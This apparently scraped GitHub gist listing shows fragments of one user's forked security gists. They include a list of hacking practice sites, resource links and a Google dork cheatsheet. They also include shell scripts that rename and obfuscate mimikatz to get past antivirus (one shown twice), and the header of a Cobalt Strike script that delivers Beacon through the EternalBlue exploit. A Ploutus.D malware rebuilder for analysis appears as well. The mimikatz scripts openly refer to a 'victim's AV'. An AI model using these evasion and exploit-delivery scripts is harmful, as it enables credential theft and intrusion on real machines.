Darksidesfear / 22 Hacking Sites To Practice Your Hacking Skills

Created September 25, 2024 20:21 — forked from numberwhun/22 Hacking Sites To Practice Your Hacking Skills

22 Hacking Sites To Practice Your Hacking Skills

	Taken from: https://hackerlists.com/hacking-sites/

	22 Hacking Sites, CTFs and Wargames To Practice Your Hacking Skills
	InfoSec skills are in such high demand right now. As the world continues to turn everything into an app and connect even the most basic devices to the internet, the demand is only going to grow, so it’s no surprise everyone wants to learn hacking these days.


	However, almost every day I come across a forum post where someone is asking where they should begin to learn hacking or how to practice hacking. I’ve compiled this list of some of the best hacking sites to hopefully be a valuable resource for those wondering how they can build and practice their hacking skill set. I hope you find this list helpful, and if you know of any other quality hacking sites, please let me know in the comments, so I can add them to the list.

	1. CTF365 https://ctf365.com/

Darksidesfear / mimikatz_obfuscator.sh

Created September 18, 2024 23:36 — forked from S3cur3Th1sSh1t/mimikatz_obfuscator.sh

Mimikatz Obfuscator

	# This script downloads and slightly "obfuscates" the mimikatz project.
	# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "[email protected]" ...,
	# so removing them from the project before compiling gets us past most of the AV solutions.
	# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
	# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.

	git clone https://github.com/gentilkiwi/mimikatz.git windows
	mv windows/mimikatz windows/candycrush
	find windows/ -type f -print0 \| xargs -0 sed -i 's/mimikatz/candycrush/g'
	find windows/ -type f -print0 \| xargs -0 sed -i 's/MIMIKATZ/CANDYCRUSH/g'

Darksidesfear / mimikatz_obfuscator.sh

Created September 18, 2024 23:36 — forked from S3cur3Th1sSh1t/mimikatz_obfuscator.sh

Mimikatz Obfuscator

	# This script downloads and slightly "obfuscates" the mimikatz project.
	# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "[email protected]" ...,
	# so removing them from the project before compiling gets us past most of the AV solutions.
	# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
	# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.

	git clone https://github.com/gentilkiwi/mimikatz.git windows
	mv windows/mimikatz windows/candycrush
	find windows/ -type f -print0 \| xargs -0 sed -i 's/mimikatz/candycrush/g'
	find windows/ -type f -print0 \| xargs -0 sed -i 's/MIMIKATZ/CANDYCRUSH/g'

Darksidesfear / obfuscate-mimikatz.sh

Created September 18, 2024 23:33 — forked from infosecn1nja/obfuscate-mimikatz.sh

	#!/bin/bash

	if [[ $# -le 1 ]] ; then
	echo './obfuscate-mimikatz.sh Invoke-Mimikatz.ps1 newfile.ps1'
	exit 1
	fi

	randstr(){< /dev/urandom tr -dc a-zA-Z0-9 \| head -c${1:-8};}

	cp $1 $2

Darksidesfear / Exploitation.md

Created August 28, 2024 18:37 — forked from yezz123/Exploitation.md

Pentesting-Exploitation

Pentesting-Exploitation Programs and Commands , Protocols Network / Ports

Google dork cheatsheet

Search filters

Filter	Description	Example
allintext	Searches for occurrences of all the keywords given.	`allintext:"keyword"`
intext	Searches for the occurrences of keywords all at once or one at a time.	`intext:"keyword"`
inurl	Searches for a URL matching one of the keywords.	`inurl:"keyword"`
allinurl	Searches for a URL matching all the keywords in the query.	`allinurl:"keyword"`
intitle	Searches for occurrences of keywords in title all or one.	`intitle:"keyword"`

Darksidesfear / Hacking Tools and Resources

Created August 28, 2024 07:46 — forked from dnbrakk/Hacking Tools and Resources

	Getting Started

	Https://wizardforcel.gitbooks.io/web-hacking-101/content/ Web Hacking 101 Chinese
	Https://wizardforcel.gitbooks.io/asani/content/ Easy to get Android security Chinese version
	Https://wizardforcel.gitbooks.io/lpad/content/ Android penetration test study manual Chinese version
	Https://wizardforcel.gitbooks.io/kali-linux-web-pentest-cookbook/content/ Kali Linux Web Penetration Test Cheats Chinese Version
	Https://github.com/hardenedlinux/linux-exploit-development-tutorial Linux exploit Development Primer
	Https://www.gitbook.com/book/t0data/burpsuite/details burpsuite actual guide
	Http://www.kanxue.com/?article-read-1108.htm=&winzoom=1 Penetration Testing Node.js Application
	Https://github.com/qazbnm456/awesome-web-security Web Security Information and Resources List

Darksidesfear / Cobalt-Strike.md

Created August 18, 2024 18:28 — forked from z0rs/Cobalt-Strike.md

Darksidesfear / eternalblue.cna

Created August 18, 2024 18:23 — forked from rsmudge/eternalblue.cna

Script to deliver Cobalt Strike's Beacon payload with the Metasploit Framework's exploit/windows/smb/ms17_010_eternalblue exploit.

	#
	# script to help move around with ms17-010 from Metasploit
	# Go to Attacks -> Eternal Blue
	#

	# target, listener, where to save .rc file
	sub generate_rc_file {
	local('$target $listener $where $handle $shellcode');
	($target, $listener, $where) = @_;

Darksidesfear / Ploutus.D_rebuilder.fs

Created May 28, 2024 21:19 — forked from enkomio/Ploutus.D_rebuilder.fs

This code extracts the real MSIL bytecode of the malware sample and rebuild a new assembly

	open System
	open System.Linq
	open System.Reflection
	open System.Runtime.CompilerServices
	open System.Collections
	open System.Collections.Generic
	open System.Diagnostics
	open Microsoft.Diagnostics.Runtime
	open dnlib.DotNet
	open dnlib.DotNet.Emit